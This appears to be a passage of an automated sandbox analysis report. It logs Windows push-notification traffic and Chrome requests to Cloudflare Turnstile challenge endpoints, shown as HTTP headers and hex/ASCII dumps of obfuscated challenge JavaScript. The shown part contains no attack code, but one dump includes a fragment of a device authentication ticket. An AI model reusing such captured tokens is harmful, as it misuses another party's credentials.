                                                                                              2024-12-19 13:36:00 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 4c 63 51 6b 48 4a 41 73 34 6b 75 58 65 53 59 75 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 62 65 38 31 66 62 32 36 33 62 37 38 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75 64
                                                                                              Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: LcQkHJAs4kuXeSYu.2Context: debe81fb263b784<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLud
                                                                                              2024-12-19 13:36:00 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 4c 63 51 6b 48 4a 41 73 34 6b 75 58 65 53 59 75 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 62 65 38 31 66 62 32 36 33 62 37 38 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                              Data Ascii: BND 3 CON\WNS 0 196MS-CV: LcQkHJAs4kuXeSYu.3Context: debe81fb263b784<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                              2024-12-19 13:36:01 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                              Data Ascii: 202 1 CON 58
                                                                                              2024-12-19 13:36:01 UTC58INData Raw: 4d 53 2d 43 56 3a 20 56 78 77 70 32 39 52 4d 6b 6b 61 77 37 65 64 59 63 30 44 4f 4d 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                              Data Ascii: MS-CV: Vxwp29RMkkaw7edYc0DOMw.0Payload parsing failed.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              15192.168.2.649763104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:01 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f47c7718f624386&lang=auto HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:02 UTC331INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:36:02 GMT
                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                              Content-Length: 124510
                                                                                              Connection: close
                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c77c8cd91a1b-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:02 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                                              2024-12-19 13:36:02 UTC1369INData Raw: 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65
                                                                                              Data Ascii: cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_success":"Success%21","turnstile_timeout":"Timed%20out","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20prope
                                                                                              2024-12-19 13:36:02 UTC1369INData Raw: 2c 66 57 2c 66 58 2c 67 71 2c 67 72 2c 67 76 2c 67 77 2c 67 44 2c 67 48 2c 66 55 2c 66 56 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 33 35 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 34 34 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 32 30 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 31 35 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 33 38 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 37 35 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 38 31 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28
                                                                                              Data Ascii: ,fW,fX,gq,gr,gv,gw,gD,gH,fU,fV){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1535))/1*(-parseInt(gI(1344))/2)+-parseInt(gI(520))/3+-parseInt(gI(315))/4+-parseInt(gI(638))/5*(-parseInt(gI(1575))/6)+-parseInt(gI(781))/7+-parseInt(
                                                                                              2024-12-19 13:36:02 UTC1369INData Raw: 6e 20 73 5e 76 7d 2c 27 57 44 44 61 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 26 73 7d 2c 27 58 4f 66 6a 65 27 3a 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 5e 73 7d 2c 27 6c 6a 51 54 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 73 2c 76 2c 78 29 7b 72 65 74 75 72 6e 20 73 28 76 2c 78 29 7d 2c 27 53 61 4e 44 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 5e 76 7d 2c 27 66 4e 43 51 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 26 73 7d 2c 27 45 47 76 47 56 27 3a 66 75 6e 63 74 69 6f 6e 28 73 2c 76 2c 78 2c 67 50 29 7b 72 65 74 75 72 6e 20 67 50 3d 67 4c 2c 66 5b 67 50 28 31 34 39 31 29 5d 28 73 2c 76 2c 78 29 7d 2c 27 6c 48 67 73 69 27 3a 66 75 6e 63 74
                                                                                              Data Ascii: n s^v},'WDDaL':function(s,v){return v&s},'XOfje':function(s,v){return v^s},'ljQTK':function(s,v,x){return s(v,x)},'SaNDl':function(s,v){return s^v},'fNCQL':function(s,v){return v&s},'EGvGV':function(s,v,x,gP){return gP=gL,f[gP(1491)](s,v,x)},'lHgsi':funct
                                                                                              2024-12-19 13:36:02 UTC1369INData Raw: 5d 7c 3d 31 32 38 2e 32 3c 3c 32 34 2d 61 36 25 33 32 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 66 6f 72 28 45 3d 30 3b 6e 5b 67 4c 28 31 33 34 35 29 5d 28 45 2c 61 61 5b 67 4c 28 38 35 32 29 5d 29 3b 45 2b 3d 31 36 29 7b 66 6f 72 28 61 4c 3d 43 5b 30 5d 2c 47 3d 43 5b 31 5d 2c 48 3d 43 5b 32 5d 2c 49 3d 43 5b 33 5d 2c 4a 3d 43 5b 34 5d 2c 4b 3d 43 5b 35 5d 2c 4c 3d 43 5b 36 5d 2c 4d 3d 43 5b 37 5d 2c 46 3d 30 3b 36 34 3e 46 3b 46 2b 2b 29 7b 28 4e 3d 46 2c 31 36 3e 46 29 3f 4f 3d 62 6c 5b 46 2b 45 5d 3a 4f 3d 28 4f 3d 44 5b 6e 5b 67 4c 28 37 38 34 29 5d 28 46 2c 32 29 5d 2c 4f 3d 6e 5b 67 4c 28 31 30 36 35 29 5d 28 62 4c 28 4f 2c 31 37 29 5e 62 4d 28 4f 2c 31 39 29 2c 4f 3e 3e 3e 31 30 2e 32 33 29 2c 4f 3d 6e 5b 67 4c 28 36 32 32 29 5d 28 62
                                                                                              Data Ascii: ]|=128.2<<24-a6%32;continue;case'2':for(E=0;n[gL(1345)](E,aa[gL(852)]);E+=16){for(aL=C[0],G=C[1],H=C[2],I=C[3],J=C[4],K=C[5],L=C[6],M=C[7],F=0;64>F;F++){(N=F,16>F)?O=bl[F+E]:O=(O=D[n[gL(784)](F,2)],O=n[gL(1065)](bL(O,17)^bM(O,19),O>>>10.23),O=n[gL(622)](b
                                                                                              2024-12-19 13:36:02 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 42 51 49 4e 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 21 3d 3d 66 7d 2c 27 43 42 7a 79 54 27 3a 67 53 28 37 38 36 29 2c 27 64 52 55 69 47 27 3a 67 53 28 31 30 38 36 29 2c 27 63 72 6a 66 77 27 3a 67 53 28 31 36 34 31 29 2c 27 56 74 4b 71 73 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2a 67 7d 2c 27 6f 43 6b 68 55 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3c 3c 67 7d 7d 2c 64 3d 31 2c 65 3d 63 5b 67 53 28 31 32 31 35 29 5d 28 31 65 33 2c 65 4d 5b 67 53 28 37 35 32 29 5d 5b 67 53 28 31 31 39 32 29 5d 28 63 5b 67 53 28 36 36 38 29 5d 28 32 2c 64 29 2c 33 32 29 29 2c 65 4d 5b 67 53 28 31 32 30 38 29
                                                                                              Data Ascii: unction(f){return f()},'BQINN':function(f,g){return g!==f},'CBzyT':gS(786),'dRUiG':gS(1086),'crjfw':gS(1641),'VtKqs':function(f,g){return f*g},'oCkhU':function(f,g){return f<<g}},d=1,e=c[gS(1215)](1e3,eM[gS(752)][gS(1192)](c[gS(668)](2,d),32)),eM[gS(1208)
                                                                                              2024-12-19 13:36:02 UTC1369INData Raw: 3a 61 52 5b 67 54 28 31 34 30 31 29 5d 5b 67 54 28 38 39 37 29 5d 3d 61 53 5b 67 54 28 31 34 34 38 29 5d 7c 7c 30 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 30 27 3a 61 68 5b 67 54 28 31 34 30 31 29 5d 5b 67 54 28 36 33 32 29 5d 3d 61 69 5b 67 54 28 33 34 36 29 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 31 27 3a 61 4e 5b 67 54 28 31 34 30 31 29 5d 5b 67 54 28 35 30 37 29 5d 3d 61 4f 5b 67 54 28 33 30 37 29 5d 7c 7c 30 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 32 27 3a 61 48 5b 67 54 28 31 34 30 31 29 5d 5b 67 54 28 35 32 33 29 5d 3d 61 49 5b 67 54 28 35 32 33 29 5d 7c 7c 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 33 27 3a 61 64 5b 67 54 28 31 34 30 31 29 5d 5b 67 54 28 31 30 39 31 29 5d 3d 61 65 5b 67 54 28 31 38 33 29 5d 3b
                                                                                              Data Ascii: :aR[gT(1401)][gT(897)]=aS[gT(1448)]||0;continue;case'10':ah[gT(1401)][gT(632)]=ai[gT(346)];continue;case'11':aN[gT(1401)][gT(507)]=aO[gT(307)]||0;continue;case'12':aH[gT(1401)][gT(523)]=aI[gT(523)]||{};continue;case'13':ad[gT(1401)][gT(1091)]=ae[gT(183)];
                                                                                              2024-12-19 13:36:02 UTC1369INData Raw: 5b 67 55 28 31 33 31 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 78 5b 67 55 28 37 32 36 29 5d 28 69 5b 67 55 28 31 34 33 32 29 5d 28 69 5b 67 55 28 31 34 33 32 29 5d 28 27 76 5f 27 2c 65 4d 5b 67 55 28 31 34 30 31 29 5d 5b 67 55 28 31 36 30 29 5d 29 2b 27 3d 27 2c 6e 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 6d 3d 28 6c 3d 7b 7d 2c 6c 5b 67 55 28 31 33 39 30 29 5d 3d 65 4d 5b 67 55 28 31 34 30 31 29 5d 5b 67 55 28 31 33 39 30 29 5d 2c 6c 5b 67 55 28 34 35 31 29 5d 3d 65 4d 5b 67 55 28 31 34 30 31 29 5d 5b 67 55 28 34 35 31 29 5d 2c 6c 5b 67 55 28 39 33 35 29 5d 3d 65 4d 5b 67 55 28 31 34 30 31 29 5d 5b 67 55 28 39 33 35 29 5d 2c 6c 5b 67 55 28 38 32 32 29 5d 3d 65 4d 5b 67 55 28
                                                                                              Data Ascii: [gU(1319)]=function(){};continue;case'1':x[gU(726)](i[gU(1432)](i[gU(1432)]('v_',eM[gU(1401)][gU(160)])+'=',n));continue;case'2':m=(l={},l[gU(1390)]=eM[gU(1401)][gU(1390)],l[gU(451)]=eM[gU(1401)][gU(451)],l[gU(935)]=eM[gU(1401)][gU(935)],l[gU(822)]=eM[gU(
                                                                                              2024-12-19 13:36:02 UTC1369INData Raw: 67 56 28 31 32 34 36 29 2c 27 47 7a 4a 79 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 67 61 6f 64 72 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 7d 2c 65 5b 67 56 28 31 33 31 30 29 5d 28 64 2c 45 72 72 6f 72 29 29 3f 65 5b 67 56 28 39 35 35 29 5d 28 67 56 28 34 35 33 29 2c 65 5b 67 56 28 31 30 36 34 29 5d 29 3f 28 66 3d 64 5b 67 56 28 35 38 38 29 5d 2c 64 5b 67 56 28 31 35 31 36 29 5d 26 26 65 5b 67 56 28 37 35 30 29 5d 28 74 79 70 65 6f 66 20 64 5b 67 56 28 31 35 31 36 29 5d 2c 67 56 28 32 36 32 29 29 29 26 26 28 6a 3d 64 5b 67 56 28 31 35 31 36 29 5d 5b 67 56 28 35 32 38 29 5d 28 27 5c 6e 27 29 2c 6a 5b 67 56 28 38 35 32 29 5d 3e 31 29 26 26 28 6b 3d
                                                                                              Data Ascii: gV(1246),'GzJyZ':function(n,o){return o===n},'gaodr':function(n,o,s){return n(o,s)}},e[gV(1310)](d,Error))?e[gV(955)](gV(453),e[gV(1064)])?(f=d[gV(588)],d[gV(1516)]&&e[gV(750)](typeof d[gV(1516)],gV(262)))&&(j=d[gV(1516)][gV(528)]('\n'),j[gV(852)]>1)&&(k=
                                                                                              2024-12-19 13:36:02 UTC1369INData Raw: 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2a 6f 7d 2c 27 41 75 57 6c 51 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 76 63 46 6b 49 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 5e 6f 7d 2c 27 62 49 6c 78 78 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 6f 7d 2c 27 61 74 44 6f 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 2c 27 59 77 72 7a 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 5e 6f 7d 2c 27 4d 54 4e 46 50 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 5e 6e 7d 2c 27 62 75 67 47 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20
                                                                                              Data Ascii: n,o){return n*o},'AuWlQ':function(n,o){return o===n},'vcFkI':function(n,o){return n^o},'bIlxx':function(n,o){return n===o},'atDoo':function(n,o){return n(o)},'Ywrzg':function(n,o){return n^o},'MTNFP':function(n,o){return o^n},'bugGj':function(n,o){return


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              16192.168.2.649764104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:01 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:02 UTC240INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:36:02 GMT
                                                                                              Content-Type: image/png
                                                                                              Content-Length: 61
                                                                                              Connection: close
                                                                                              cache-control: max-age=2629800, public
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c77d6bb8f5fa-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:02 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              17192.168.2.649773104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:03 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:04 UTC240INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:36:03 GMT
                                                                                              Content-Type: image/png
                                                                                              Content-Length: 61
                                                                                              Connection: close
                                                                                              cache-control: max-age=2629800, public
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c787ea2842dc-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:04 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              18192.168.2.649774104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:04 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f47c7718f624386&lang=auto HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:04 UTC331INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:36:04 GMT
                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                              Content-Length: 111358
                                                                                              Connection: close
                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c78aea4ac440-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:04 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                              2024-12-19 13:36:04 UTC1369INData Raw: 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 74 75 72
                                                                                              Data Ascii: rnstile_verifying":"Verifying...","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_footer_privacy":"Privacy","turnstile_failure":"Error","turnstile_feedback_description":"Send%20Feedback","tur
